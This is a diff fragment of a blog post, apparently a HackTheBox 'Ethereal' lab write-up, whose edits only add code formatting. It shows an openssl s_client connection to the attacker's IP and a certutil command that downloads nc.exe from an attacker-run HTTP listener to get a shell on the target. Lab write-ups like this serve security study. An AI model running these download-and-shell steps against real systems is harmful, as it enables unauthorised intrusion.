ankit0183/ankit0183.github.io/_posts/2020-07-12-HackTheBox-Ethereal.md

 "c:\program files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -host 10.10.14.23 -port 138
 ```

-From the pcap, I identified inbound connections on port 73 and 136.
+From the pcap, I identified inbound connections on port `73` and `136`.

 ![](/assets/images/htb-writeup-ethereal/wireshark.png)

-Now, we just need to get netcat uploaded to the server and try to get a proper shell.
+Now, we just need to get netcat uploaded to the `server` and try to get a proper shell.

 First, let's start an HTTP listener on port 73 to host nc.exe, then issue `certutil.exe -urlcache -split -f http://10.10.14.23:73/nc.exe c:\users\public\desktop\shortcuts\nc.exe`